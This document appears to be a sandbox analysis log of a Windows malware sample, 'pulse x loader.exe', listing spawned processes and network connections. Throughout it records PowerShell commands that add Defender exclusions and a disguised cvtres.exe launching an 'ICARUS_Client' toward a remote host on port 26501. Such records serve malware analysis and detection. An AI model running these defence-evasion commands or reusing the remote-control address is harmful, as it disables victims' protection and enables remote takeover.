C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES91AC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4EF71ED814C1400BBAC02FF6BC341D.TMP"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\54dljrdb\54dljrdb.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7D4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD9A93F59C6274046AB86D045817B47AF.TMP"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bzpigqxz\bzpigqxz.cmdline"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA11.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF94C92117F409F8CAB372BF587B39E.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f4qxi0qt\f4qxi0qt.cmdline"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE635.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD59C4322AFD54F64A55585C4165172C.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1zoyphjr\1zoyphjr.cmdline"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC98B123E02A0945A5B6756A807C99F6DB.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x4tddd3a\x4tddd3a.cmdline"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES195A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC14D7E0E7A4F9463589D340F9195070A8.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uwpv2pbb\uwpv2pbb.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2BAA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F34258A595A44A299E8D14E911FF6CB.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\agun3vry\agun3vry.cmdline"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4220.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F0CAB8C316D4C5AAE71B651E5ADFFCB.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cwub4mdt\cwub4mdt.cmdline"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES57AB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC40067C97CD5D4804BF1E795BEEDDA54B.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gyuvwgk2\gyuvwgk2.cmdline"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75E2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE6D2D4D6A420418CAAC7B750473A74E4.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lofq2i40\lofq2i40.cmdline"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87F3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF909CFD095CE404E8CB41272ECECD285.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 17.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| N/A | 127.0.0.1:59948 | tcp | |
| N/A | 127.0.0.1:59950 | tcp | |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
Files
